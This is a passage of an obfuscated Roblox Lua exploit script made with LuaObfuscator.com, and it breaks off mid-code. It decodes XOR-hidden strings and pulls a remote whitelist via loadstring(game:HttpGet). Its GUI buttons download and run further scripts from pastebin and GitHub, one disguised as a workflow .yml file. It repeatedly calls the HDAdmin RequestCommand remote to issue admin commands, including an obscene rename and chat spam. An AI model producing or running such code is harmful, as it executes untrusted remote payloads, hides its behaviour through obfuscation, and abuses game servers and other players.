--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.1.8) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v9,v10)local v11={};for v29=2 -1, #v9 do v6(v11,v0(v4(v1(v2(v9,v29,v29 + (2 -1))),v1(v2(v10,1 + (0 -0) + ((v29-(954 -(61 + 116 + 776)))% #v10),((1198 -(215 + 228)) -(154 + 68 + 532)) + ((v29-(1121 -(1081 + 39)))% #v10) + (210 -(14 + 195)))))%((586 -407) + 77)));end return v5(v11);end local v8=loadstring(game:HttpGet("https://raw.githubusercontent.com/Bekonader/bahahaha/main/Bahahah",true))();if v8[game.Players.LocalPlayer.Name] then local v12=810 -((998 -(545 + 374)) + (2587 -(23 + 1833)));local v13;local v14;while true do if (v12==(1 + 0)) then while true do if (v13==1) then local v30=229 -(74 + 155);while true do if ((0 + (0 -0))==v30) then game:GetService(v7("\159\225\84\233\164\231\69\241\168\224\119\241\162\246\69\226\168","\205\132\36\133")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v14));wait(1);v30=1;end if (v30==1) then v13=2 + 0;break;end end end if ((5 -3)==v13) then v14={[1]=";name me اه اه كـسـ ي"};game:GetService(v7("\151\171\227\204\172\173\242\212\160\170\192\212\170\188\242\199\160","\197\206\147\160")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v14));break;end if (v13==0) then local v31=0 -0;while true do if (v31==0) then wait(0.5);v14={[(1311 -469) -((1977 -(1033 + 402)) + 299)]=v7("\37\23\238\249\14\242\238\214\62\68\182\246\16\171\249\131\123","\30\116\134\152\124\210\131\179")};v31=1 + (0 -0);end if (v31==(1 + 0)) then v13=1;break;end end end end break;end if (v12==(0 + 0)) then v13=0 -0;v14=nil;v12=2 -1;end end else local v15=0 -0;local v16;local v17;local v18;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;while true do if (v15==(2 -0)) then v22=nil;v23=nil;v24=nil;v15=3;end if (v15==(1 + 2)) then v25=nil;v26=nil;v27=nil;v15=586 -(471 + 111);end if (v15==((0 -0) + 0)) then v16=0 + 0;v17=nil;v18=nil;v15=535 -(287 + 247);end if (1==v15) then v19=nil;v20=nil;v21=nil;v15=2;end if (v15==(4 -0)) then v28=nil;while true do if (v16==4) then local v32=0 -0;while true do if (v32==(0 -0)) then v24=v18:MakeTab({[v7("\5\33\88\66","\75\64\53\39")]=v7("\155\138\202\138","\220\223\131\217\189\215"),[v7("\83\244\89\188","\26\151\54\210\147\45\183\77")]="rbxassetid://4483345998",[v7("\113\151\21\160\253\248\143\110\139\28\180","\33\229\112\205\148\141\226")]=false});v20=v24:AddSection({[v7("\237\204\5\76","\163\173\104\41\121\28")]=v7("\95\193\156\236","\24\148\213\191\98\213\234")});v32=1 -0;end if (v32==(1298 -((257 -160) + (2364 -(166 + 998))))) then v24:AddButton({[v7("\249\23\59\115","\183\118\86\22\211")]=v7("\76\156\60\55\76\252\72\63\157","\31\229\82\86\60\143\45"),[v7("\212\207\45\31\133\30\244\197","\151\174\65\115\231\127")]=function()loadstring(game:HttpGet("https://pastebin.com/raw/tWGxhNq0"))();end});v24:AddButton({[v7("\246\210\251\163","\184\179\150\198\46")]=v7("\106\235\121\252\150\25\8\123\232","\46\170\42\175\215\57\64"),[v7("\60\115\173\123\138\209\28\121","\127\18\193\23\232\176")]=function()loadstring(game:HttpGet("https://raw.githubusercontent.com/Makramdaca/dacca/main/.github/workflows/blank.yml"))();end});v32=5 -3;end if (v32==(1 + 1)) then v16=5;break;end end end if (v16==3) then local v33=521 -(226 + 295);while true do if (v33==2) then v16=4;break;end if (v33==(0 -0)) then v23=v18:MakeTab({[v7("\7\81\112\211","\73\48\29\182\40\78")]=v7("\12\226\249\217\142\201\128","\95\161\171\144\222\157\211"),[v7("\6\219\116\164","\79\184\27\202\177\56\50\158")]="rbxassetid://4483345998",[v7("\210\3\125\51\86\80\239\62\118\50\70","\130\113\24\94\63\37")]=false});v20=v23:AddSection({[v7("\217\215\236\26","\151\182\129\127\171")]=v7("\251\193\241\213\194\119\78","\168\130\163\156\146\35\29\152")});v33=1;end if (v33==((883 + 55) -(130 + 807))) then v22:AddButton({[v7("\158\85\126\192","\208\52\19\165\138")]=v7("\165\33\161\38\90\114\140","\224\103\231\99\25\38\223\176"),[v7("\119\244\113\235\86\244\126\236","\52\149\29\135")]=function()local v49=0 + (0 -0);local v50;local v51;while true do if (1==v49) then while true do if (v50==((5 + 3) -4)) then local v90=0;while true do if (v90==3) then v50=(442 -(332 + 96)) -(1736 -(626 + 1101));break;end if (v90==2) then v51={[1 + 0]=v7("\65\163\88\61\90\166\92\105\75\255\8\126\78\249\13\120\66","\122\203\57\73")};game:GetService(v7("\36\7\42\169\78\139\87\2\7\62\150\83\135\68\23\5\63","\118\98\90\197\39\232\54")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v51));v90=3;end if (v90==1) then game:GetService(v7("\121\142\77\15\82\49\191\95\142\89\48\79\61\172\74\140\88","\43\235\61\99\59\82\222")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v51));wait(1085 -(837 + 134 + 113));v90=2;end if (0==v90) then wait(1);v51={[1]=v7("\181\66\28\248\121\168\124\64\191\18\78\184\111\253\32\86\189","\142\42\125\140\89\197\25\96")};v90=1;end end end if (v50==(1093 -(976 + 103))) then wait(1);v51={[1 -(262 -(147 + 115))]=v7("\171\114\11\248\195\225\61\253\116\68\251\222\242\115\247\116","\144\17\100\148\172\147\29")};game:GetService(v7("\244\217\56\254\207\223\41\230\195\216\27\230\201\206\41\245\195","\166\188\72\146")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v51));game:GetService(v7("\184\177\56\1\31\179\153\130\44\26","\235\197\89\115\107\214")):SetCore(v7("\101\86\14\115\120\92\20\126\80\90\3\118\66\90\15\121","\54\51\96\23"),{[v7("\183\53\197\21\225","\227\92\177\121\132\196")]="اكتملت الhats بنجاح",[v7("\199\127\102\96","\147\26\30\20\60")]="مبروك صرت مزعج مره",[v7("\89\69\8\69","\16\38\103\43\84\232\87\77")]="rbxthumb://type=Asset&id=5107182114&w=150&h=150"});Duration=32;break;end if (v50==(1 + 9)) then local v91=0 -0;while true do if (v91==(1 -0)) then game:GetService(v7("\213\49\223\19\238\55\206\11\226\48\252\11\232\38\206\24\226","\135\84\175\127")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v51));wait((4620 -2996) -((914 -(138 + 263)) + 1110));v91=8 -6;end if (3==v91) then v50=11;break;end if (2==v91) then v51={[1]=v7("\12\8\182\110\245\24\82\64\228\43\228\65\2\80\230\41\228","\55\96\215\26\213\117")};game:GetService(v7("\18\192\79\77\250\35\196\75\68\247\19\209\80\83\242\39\192","\64\165\63\33\147")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v51));v91=(2008 -(483 + 571)) -(81 + 870);end if (v91==0) then wait((1436 -(867 + 567)) -1);v51={[1 + 0]=v7("\13\29\124\221\174\212\92\89\4\71\43\152\182\128\1\78\7","\54\117\29\169\142\185\57\121")};v91=1;end end end if (v50==(32 -24)) then local v92=(303 -(10 + 293)) -(0 + 0);while true do if (v92==(74 -(10 + 62))) then local v141=0;while true do if (v141==0) then v51={[1323 -(587 + 735)]=v7("\222\61\136\193\225\136\48\201\132\246\214\99\219\129\247\220\98","\229\85\233\181\193")};game:GetService(v7("\100\254\199\72\89\31\52\191\83\255\228\80\95\14\52\172\83","\54\155\183\36\48\124\85\203")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v51));v141=1;end if (v141==1) then v92=(1 -0) + 2;break;end end end if (v92==3) then v50=9;break;end if (((1129 -(655 + 474)) + (84 -(60 + 24)))==v92) then wait(1);v51={[1]=v7("\12\173\10\14\23\168\14\90\6\242\88\76\5\241\93\74\5","\55\197\107\122")};v92=(3 -2) + (0 -0);end if (v92==(1 + 0)) then game:GetService(v7("\46\89\22\87\141\6\41\8\89\2\104\144\10\58\29\91\3","\124\60\102\59\228\101\72")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v51));wait(1222 -(147 + 1074));v92=6 -4;end end end if ((3 + 0)==v50) then local v93=(1068 -(293 + 775)) + 0;while true do if (v93==(8 -5)) then v50=(1178 -(353 + 12)) -(62 + 747);break;end if (v93==0) then local v142=0;while true do if (v142==1) then v93=1;break;end if (0==v142) then wait(1 + 0);v51={[1 + 0 + 0]=v7("\39\52\162\78\164\83\85\53\46\109\246\13\181\6\5\36\41","\28\92\195\58\132\62\48\21")};v142=1;end end end if (v93==(395 -(128 + 266))) then game:GetService(v7("\155\18\85\34\66\49\135\189\18\65\29\95\61\148\168\16\64","\201\119\37\78\43\82\230")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v51));wait(1);v93=2;end if ((703 -(34 + 667))==v93) then local v143=0;while true do if (v143==1) then v93=(2325 -1126) -(59 + 1069 + 68);break;end if (v143==0) then v51={[1970 -(1301 + 668)]=v7("\243\236\192\14\204\85\38\232\181\152\72\217\13\116\241\181\146","\200\132\161\122\236\56\67")};game:GetService(v7("\225\171\79\115\251\8\55\0\214\170\108\107\253\25\55\19\214","\179\206\63\31\146\107\86\116")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v51));v143=1;end end end end end if (v50==(1 + (1518 -(425 + 1093)))) then local v94=0;while true do if ((293 -(164 + 126))==v94) then v50=2;break;end if (1==v94) then game:GetService(v7("\47\223\88\167\204\177\208\67\24\222\123\191\202\160\208\80\24","\125\186\40\203\165\210\177\55")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v51));wait(1);v94=2;end if (v94==0) then wait(1 + (1992 -(93 + 1899)));v51={[1612 -(282 + 1329)]=v7("\165\47\251\244\167","\158\76\147\149\213\224")};v94=1318 -(795 + 522);end if ((1 + 1)==v94) then v51={[3 -2]=v7("\113\142\113\227\111\237\47\198\33\162\127\179\114\215\32\162\126","\74\230\16\151\79\128")};game:GetService(v7("\55\26\51\249\12\28\34\225\0\27\16\225\10\13\34\242\0","\101\127\67\149")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v51));v94=(909 -565) -((258 -168) + 251);end end end if (5==v50) then local v95=0;local v96;while true do if (v95==0) then v96=0 + 0;while true do if (v96==(0 -0)) then wait(2 -1);v51={[1528 -(322 + 1205)]=v7("\146\71\206\82\181\79\204\15\158\21\167\26\153\22\155\21\164","\169\47\175\38\149\34")};v96=(1666 -(1358 + 307)) -(0 + 0);end if (v96==(1911 -(900 + 1010))) then game:GetService(v7("\114\172\172\42\25\67\168\168\35\20\115\189\179\52\17\71\172","\32\201\220\70\112")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v51));wait((2 -1) + (0 -0));v96=(3646 -2319) -(592 + (2267 -1534));end if ((1228 -(1084 + 141))==v96) then v50=(13 + 0) -(2 + 5);break;end if (2==v96) then local v181=0;while true do if (v181==1) then v96=3 + 0;break;end if (v181==0) then v51={[1]=v7("\45\26\240\20\18\123\23\177\81\6\33\70\167\85\5","\22\114\145\96\50")};game:GetService(v7("\104\20\19\211\83\43\76\63\95\21\48\203\85\58\76\44\95","\58\113\99\191\58\72\45\75")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v51));v181=1;end end end end break;end end end if (2==v50) then wait(1);v51={[1]=v7("\249\53\42\240\226\48\46\164\243\101\124\189\251\101\123\177\244","\194\93\75\132")};game:GetService(v7("\34\232\176\232\21\93\174\4\232\164\215\8\81\189\17\234\165","\112\141\192\132\124\62\207")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v51));wait(1 + (0 -0));v51={[1]=v7("\178\255\34\34\236\19\206\169\166\116\98\248\78\157\185\165\122\100","\137\151\67\86\204\126\171")};game:GetService(v7("\200\185\32\3\16\12\53\174\255\184\3\27\22\29\53\189\255","\154\220\80\111\121\111\84\218")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v51));v50=1225 -(333 + 889);end if (v50==7) then local v97=(2419 -(1084 + 300)) -((1520 -1083) + 598);while true do if (v97==(3 + 0)) then v50=8;break;end if (v97==1) then game:GetService(v7("\246\14\90\92\18\56\161\208\14\78\99\15\52\178\197\12\79","\164\107\42\48\123\91\192")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v51));wait(1);v97=5 -3;end if (v97==(0 + 0 + (0 -0))) then wait(1099 -(435 + 138 + 525));v51={[1]=v7("\251\53\88\41\229\173\56\25\108\242\243\107\11\105\243\245\108","\192\93\57\93\197")};v97=1;end if (v97==(94 -(32 + 44 + 16))) then local v144=0;while true do if (v144==0) then v51={[1]=v7("\166\93\248\200\248\240\80\185\141\239\174\3\171\136\239\169\12","\157\53\153\188\216")};game:GetService(v7("\47\117\74\12\229\51\28\100\95\4\223\36\18\98\91\7\233","\125\16\58\96\140\80")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v51));v144=1;end if (v144==1) then v97=10 -7;break;end end end end end if (v50==(76 -(37 + 30))) then local v98=0;while true do if (v98==(3 -1)) then v51={[(739 -(11 + 727)) + 0]=v7("\97\245\210\56\68\50\173\122\172\129\116\86\110\255\98\165\134","\90\157\179\76\100\95\200")};game:GetService(v7("\59\175\215\189\66\0\8\190\194\181\120\23\6\184\198\182\78","\105\202\167\209\43\99")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v51));v98=7 -4;end if (v98==(0 + 0)) then local v145=0;while true do if (0==v145) then wait(4 -3);v51={[(27 + 93) -(32 + 87)]=v7("\40\34\99\161\45\38\55\176\119\112\33\179\116\118\33\176","\64\67\23\129")};v145=1;end if (v145==1) then v98=1;break;end end end if ((1816 -(738 + 1075))==v98) then v50=10;break;end if (v98==(1 -0)) then game:GetService(v7("\20\160\231\114\202\44\4\50\160\243\77\215\32\23\39\162\242","\70\197\151\30\163\79\101")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v51));wait(1);v98=2;end end end if (11==v50) then local v99=0 + 0;while true do if (v99==2) then v51={[1908 -(1028 + 879)]=v7("\13\237\189\171\118\91\224\252\237\98\7\180\238\233\96\1","\54\133\220\223\86")};game:GetService(v7("\233\65\174\253\220\216\69\170\244\209\232\80\177\227\212\220\65","\187\36\222\145\181")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v51));v99=(4 -2) + (2 -1);end if (v99==(1 + 0)) then game:GetService(v7("\127\4\49\31\46\161\11\208\72\5\18\7\40\176\11\195\72","\45\97\65\115\71\194\106\164")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v51));wait(1 -0);v99=374 -(344 + 28);end if (v99==3) then v50=(130 -86) -(98 -66);break;end if (v99==0) then wait((1214 -(521 + 692)) -(0 -0));v51={[(1 -0) + (0 -0)]=v7("\150\33\66\55\239\112\161\82\156\127\26\119\251\41\241\67\152","\173\73\35\67\207\29\196\114")};v99=(1 -0) + 0;end end end if (v50==6) then local v100=0 + 0;while true do if (v100==((952 -(42 + 906)) -2)) then local v146=0;while true do if (v146==0) then v51={[501 -(25 + 0 + 475)]=v7("\122\21\22\28\190\78\36\93\79\81\175\20\112\77\64\89","\65\125\119\104\158\35")};game:GetService(v7("\142\55\51\178\181\49\34\170\185\54\16\170\179\32\34\185\185","\220\82\67\222")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v51));v146=1;end if (v146==1) then v100=3;break;end end end if (v100==((438 + 478) -((920 -445) + 440))) then game:GetService(v7("\208\124\45\23\224\66\138\183\231\125\14\15\230\83\138\164\231","\130\25\93\123\137\33\235\195")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v51));wait(1034 -(865 + 168));v100=(141 + 1188) -(1190 + (1349 -(1169 + 43)));end if (v100==((0 -0) + 0 + 0)) then wait((3340 -2475) -((2080 -(377 + 848)) + (24 -15)));v51={[(1905 -(1051 + 853)) + 0]=v7("\135\78\2\237\156\75\6\185\142\21\80\174\140\19\80\172\136","\188\38\99\153")};v100=1 -0;end if (v100==((2811 -(100 + 1071)) -((426 -(17 + 142)) + (3250 -1880)))) then v50=512 -(27 + 35 + 443);break;end end end if (v50==((576 + 140) -(252 + (622 -(109 + 49))))) then local v101=0 + 0;while true do if (v101==2) then v51={[1]=v7("\127\87\162\222\104\44\26\160\201\56\42\85\162\206\41","\68\58\205\172\24")};game:GetService(v7("\190\120\30\121\80\143\124\26\112\93\191\105\1\103\88\139\120","\236\29\110\21\57")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v51));v101=3;end if (v101==(10 -7)) then v50=1;break;end if (v101==0) then local v147=0;while true do if (v147==1) then v101=(2 -1) -0;break;end if (v147==0) then wait(3 -2);v51={[1 + 0 + 0]=v7("\115\12\189\250\183\128\125\125\45\65\182","\72\97\210\136\199\232\93\16")};v147=1;end end end if (v101==(894 -(363 + (1330 -800)))) then game:GetService(v7("\214\129\40\239\239\177\59\240\129\60\208\242\189\40\229\131\61","\132\228\88\131\134\210\90")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v51));wait(1 + 0);v101=2 + 0 + 0 + 0;end end end if (v50==(16 -4)) then wait(2 -1);v51={[1]=v7("\163\45\35\146\239\118\214\108\171\118\114\209\255\45\138\122","\152\69\66\230\207\27\179\76")};game:GetService(v7("\142\113\229\51\22\202\42\168\113\241\12\11\198\57\189\115\240","\220\20\149\95\127\169\75")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v51));wait(1 + 0);v51={[1]=v7("\113\80\69\8\128\39\93\4\78\150\120\14\18\69\151\127\14","\74\56\36\124\160")};game:GetService(v7("\68\73\102\82\218\117\77\98\91\215\69\88\121\76\210\113\73","\22\44\22\62\179")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v51));v50=13 + 0;end if (v50==((882 -(808 + 57)) -4)) then local v102=793 -(612 + 181);while true do if (v102==(6 -(9 -6))) then v50=14;break;end if (v102==0) then wait(1);v51={[1]=v7("\224\179\11\89\183\171\234\251\233\89\30\165\243\188\232\234\91","\219\219\106\45\151\198\143")};v102=1;end if (v102==2) then v51={[1]=v7("\148\31\136\123\44\26","\175\120\228\26\95\105\160")};game:GetService(v7("\31\211\4\228\36\213\21\252\40\210\39\252\34\196\21\239\40","\77\182\116\136")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v51));v102=3 + 0;end if (v102==1) then game:GetService(v7("\159\44\70\198\251\211\136\185\44\82\249\230\223\155\172\46\83","\205\73\54\170\146\176\233")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v51));wait(1);v102=2;end end end end break;end if (v49==(0 -0)) then v50=0 + (399 -(182 + 217));v51=nil;v49=1;end end end});v23:AddButton({[v7("\81\179\214\190","\31\210\187\219\181\156\146\142")]=v7("\109\199\105\149\2\56\23\107","\44\137\61\220\64\121\89"),[v7("\201\225\179\164\232\225\188\163","\138\128\223\200")]=function()local v52=0;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if (v52==1) then v55=nil;v56=nil;v52=4 -2;end if (v52==(10 -7)) then v59=nil;while true do if (v53==(27 -16)) then local v103=0;local v104;while true do if (v103==0) then v104=0;while true do if (v104==1) then v58.MouseButton1Down:connect(function()local v192=0 + 0;local v193;while true do if ((0 -0)==v192) then v193=0;while true do if (v193==0) then _G.antibang=true;antibang();break;end end break;end end end);v59.Parent=v55;v104=2 + 0;end if (v104==(2 + 0 + 0)) then v53=12;break;end if (0==v104) then v58.TextSize=22 -8;v58.TextWrapped=true;v104=1 + 0 + 0;end end break;end end end if (v53==10) then v58.Font=Enum.Font.SourceSans;v58.Text=v7("\242\220\95\82\241\211\69\92","\147\178\43\59");v58.TextColor3=Color3.fromRGB(0 + 0,0,656 -((914 -604) + 346));v58.TextScaled=true;v53=9 + 2;end if (v53==9) then v58.Parent=v55;v58.BackgroundColor3=Color3.fromRGB((885 + 371) -((2433 -(1250 + 554)) + (1124 -582)),199 -114,1828 -(203 + 5 + (3325 -1705)));v58.Position=UDim2.new(0 + 0,0 -0,0.539999962,961 -(383 + 578));v58.Size=UDim2.new(449 -(23 + 426),100,0 -(42 -(32 + 10)),277 -(170 + 87));v53=6 + 4;end if (v53==8) then local v114=0;while true do if ((6 -4)==v114) then v53=9;break;end if (0==v114) then v57.TextScaled=true;v57.TextSize=8 + 6;v114=(811 -(470 + 340)) + (1151 -(379 + 772));end if (v114==1) then v57.TextWrapped=true;v57.MouseButton1Down:connect(function()loadstring(game:HttpGet("https://raw.githubusercontent.com/BloodyBurns/Hexx/main/Iv%20Admin/Admin%202.lua"))();end);v114=2;end end end if ((1150 -(163 + 980))==v53) then local v115=0;while true do if (v115==(850 -(66 + 782))) then v53=8;break;end if (v115==(2 -1)) then v57.Text=v7("\20\71\220\88\28\11\218\85\87\70\208\27\17\66\199\72\3","\119\43\181\59");v57.TextColor3=Color3.fromRGB(0,(0 -0) -0,0);v115=5 -3;end if (v115==(0 + 0 + (0 -0))) then v57.Size=UDim2.new(0,(2193 -(738 + 441)) -(208 + (1494 -(679 + 109))),0 + (0 -0),32 -12);v57.Font=Enum.Font.SourceSans;v115=1;end end end if (v53==(6 -3)) then local v116=0;local v117;while true do if (v116==0) then v117=0;while true do if (1==v117) then v55.Draggable=true;v56.Parent=v55;v117=2;end if (v117==(855 -(354 + 501))) then v55.Size=UDim2.new(0 -0,100,(165 -(96 + 69)) -0,(1246 -957) -189);v55.Active=true;v117=1892 -((2762 -(11 + 1900)) + 1040);end if (v117==2) then v53=(18 -14) -(1910 -(786 + 1124));break;end end break;end end end if ((3 + 1)==v53) then v56.BackgroundColor3=Color3.fromRGB((600 -257) -(62 + 23 + 3),85,0);v56.Position=UDim2.new( -((0.00410109013 -0) -0),0, -(1045.00617286563 -((1278 -(295 + 51)) + 88 + 25)),0 + 0);v56.Size=UDim2.new(0,85 + 15,0,33 -(25 -11));v56.Font=Enum.Font.SourceSans;v53=(19 -15) + 1;end if (v53==(0 -0)) then local v123=(1984 -(845 + 1139)) + (0 -0);while true do if (v123==(5 -3)) then v53=1 -0;break;end if (v123==(0 + 0)) then v54=Instance.new(v7("\178\121\158\249\230\255\80\148\115","\225\26\236\156\131\145\23"));v55=Instance.new(v7("\115\189\6\132\193","\53\207\103\233\164\19\71\235"));v123=1092 -(666 + 425);end if (v123==1) then v56=Instance.new(v7("\195\74\33\51\194\206\245\74\53","\151\47\89\71\142\175"));v57=Instance.new(v7("\145\220\244\103\118\199\212\14\170\215","\197\185\140\19\52\178\160\122"));v123=2;end end end if (v53==(18 -6)) then local v124=0;while true do if (v124==(1859 -((455 -(63 + 85)) + (1609 -(50 + 8))))) then v59.Size=UDim2.new(0 -(0 + 0),1805 -(806 + (2756 -1857)),0,35 -15);v59.Font=Enum.Font.SourceSans;v124=2;end if ((705 -(338 + 367))==v124) then v59.BackgroundColor3=Color3.fromRGB(254 -169,85,0);v59.Position=UDim2.new(0,0 + 0,0.800000012,0 + 0);v124=(1 -0) + (1534 -(1370 + 164));end if (v124==(4 -2)) then v53=13;break;end end end if (v53==(10 -5)) then local v125=0 -0;while true do if (v125==1) then v56.TextScaled=true;v56.TextSize=14;v125=1 + 1;end if (v125==(0 -0)) then v56.Text=v7("\160\137\253\65\72\234\84\166","\193\231\137\40\42\139\58");v56.TextColor3=Color3.fromRGB(0,0 -0,0);v125=2 -1;end if (v125==(2 + (0 -0))) then v53=6;break;end end end if (v53==1) then v58=Instance.new(v7("\76\235\145\202\117\109\250\157\209\89","\24\142\233\190\55"));v59=Instance.new(v7("\47\2\66\62\81\14\19\78\37\125","\123\103\58\74\19"));antibang=function()while _G.antibang==true do local v165=0 -0;local v166;while true do if (v165==0) then v166=0;while true do if (v166==0) then game.Players:Chat(v7("\85\208\64\184\218\25\208\64\171","\123\177\46\204\179"));wait(1419 -(652 + 766));break;end end break;end end end end;v54.Parent=game.Players.LocalPlayer:WaitForChild(v7("\118\180\242\213\67\170\212\217\79","\38\216\147\172"));v53=1983 -(886 + 1095);end if (v53==2) then local v127=0;while true do if (v127==0) then v54.ResetOnSpawn=false;v55.Parent=v54;v127=1;end if (v127==1) then v55.BackgroundColor3=Color3.fromRGB(83,81 + 2,57 + 26);v55.Position=UDim2.new(0.0661887601,0 + 0,0.293827176,1196 -(534 + 662));v127=2;end if (2==v127) then v53=(686 -(31 + 647)) -(1 + 4);break;end end end if (v53==13) then v59.Text=v7("\165\38\75\27\55\122\11\36\191\48\69\5\112","\214\82\36\107\23\27\101\80");v59.TextColor3=Color3.fromRGB(0,1719 -((1417 -989) + 1291),0);v59.TextScaled=true;v59.TextSize=14;v53=298 -(8 + 276);end if (v53==(3 + 11)) then v59.TextWrapped=true;v59.MouseButton1Down:connect(function()_G.antibang=false;end);break;end if (v53==((746 -496) -(51 + 7 + (499 -313)))) then local v133=0;while true do if (v133==(1966 -((244 -190) + 1910))) then v53=4 + 3;break;end if (v133==1) then local v171=0;while true do if (v171==0) then v57.BackgroundColor3=Color3.fromRGB(85,1862 -(89 + 1142 + 546),0);v57.Position=UDim2.new(0 + 0,0 + 0,0.269999981,0);v171=1;end if (v171==1) then v133=7 -5;break;end end end if (v133==(0 + (0 -0))) then v56.TextWrapped=true;v57.Parent=v55;v133=1;end end end end break;end if (v52==0) then v53=0;v54=nil;v52=1 -0;end if (v52==2) then v57=nil;v58=nil;v52=3 + 0;end end end});v33=1815 -(563 + 1250);end end end if (v16==1) then local v34=1854 -(900 + 954);while true do if (v34==(1 + 1)) then v16=2;break;end if (v34==((222 + 357) -(214 + 365))) then v19:AddButton({[v7("\18\83\70\74","\92\50\43\47")]=v7("\146\43","\192\110\140\130"),[v7("\148\225\1\95\204\247\180\235","\215\128\109\51\174\150")]=function()local v60=0 -0;local v61;while true do if (v60==(270 -(13 + 256))) then game:GetService(v7("\34\77\98\185\238\19\73\102\176\227\35\92\125\167\230\23\77","\112\40\18\213\135")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v61));break;end if (v60==0) then local v71=0;local v72;while true do if (v71==0) then v72=0;while true do if (v72==(334 -(90 + 243))) then v60=1;break;end if (v72==(0 -0)) then wait((3493.1 -2084) -(120 + 1289));v61={[1 + (0 -0)]=v7("\81\95\124","\106\45\25\118")};v72=274 -((391 -215) + 97);end end break;end end end end end});v19:AddButton({[v7("\135\79\112\199","\201\46\29\162\96")]=v7("\131\126","\209\72\230\85\104\197\117"),[v7("\82\88\77\204\11\73\168\243","\17\57\33\160\105\40\203\152")]=function()local v62=0;local v63;local v64;while true do if (v62==(0 -(0 + 0))) then local v73=0;while true do if (v73==0) then v63=0;v64=nil;v73=1;end if (v73==1) then v62=(209 -(89 + 119)) + 0;break;end end end if (((2 -1) + (1960 -(783 + 1177)))==v62) then while true do if (((373 -(93 + 280)) -0)==v63) then local v134=0;local v135;while true do if (v134==0) then v135=1495 -(1436 + 59);while true do if (v135==(0 + 0 + 0 + 0)) then wait(0.1 + 0);v64={[1 + 0]=v7("\237\216\89\236\149\190\149\91\251\197\146\218\88\255\137\178\225\68\235\136\166\149","\214\181\54\158\229")};v135=1 + 0;end if (v135==1) then game:GetService(v7("\79\33\219\232\207\55\48\179\120\32\248\240\201\38\48\160\120","\29\68\171\132\166\84\81\199")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v64));wait(0.1 + 0);v135=2;end if ((2 + 0)==v135) then v63=1 + (1928 -(882 + 1046));break;end end break;end end end if (v63==(8 -6)) then game:GetService(v7("\221\89\207\91\64\167\238\72\218\83\122\176\224\78\222\80\76","\143\60\191\55\41\196")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v64));wait(0.1);v64={[2 -1]=v7("\34\202\183\165\65\120\205","\25\191\217\198\41")};game:GetService(v7("\184\194\25\133\43\181\232\164\143\195\58\157\45\164\232\183\143","\234\167\105\233\66\214\137\208")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v64));break;end if (v63==1) then local v136=0;local v137;while true do if (v136==0) then v137=0 + 0;while true do if (v137==(0 -0)) then v64={[1 + 0]=v7("\190\220\14\5\61","\133\191\102\100\79\202\99\44")};game:GetService(v7("\192\84\175\190\7\176\243\69\186\182\61\167\253\67\190\181\11","\146\49\223\210\110\211")).HDAdminClient.Signals.RequestCommand:InvokeServer(unpack(v64));v137=(1257 -(711 + 545)) + (120 -(115 + 5));end if ((7 -5)==v137) then v63=1 + 1;break;end if (v137==1) then wait((0.1 -0) + (0 -0));v64={[1]=v7("\160\196\219\88\227\243\137\217\79\179\245\198\219\72\162\187","\155\169\180\42\147")};v137=3 -1;end end break;end end end end break;end end end});v34=1;end if (1==v34) then v21=v18:MakeTab({[v7("\149\62\195\140","\219\95\174\233\75")]=v7("\9\36\95\220\164","\72\96\18\149\234\197\74\207"),[v7("\207\168\172\237","\134\203\195\131\126\147")]="rbxassetid://4483345998",[v7("\150\19\187\73\44\179\12\145\74\41\191","\198\97\222\36\69")]=false});v20=v21:AddSection({[v7("\163\54\215\118","\237\87\186\19")]=v7("\202\142\42\26\33","\139\202\103\83\111\121")});v34=2;end end end if (v16==8) then local v35=861 -((981 -(209 + 28)) + 117);while true do if (v35==2) then v16=9;break;end if (v35==(1 -0)) then local v47=0;while true do if (v47==1) then v35=2;break;end if 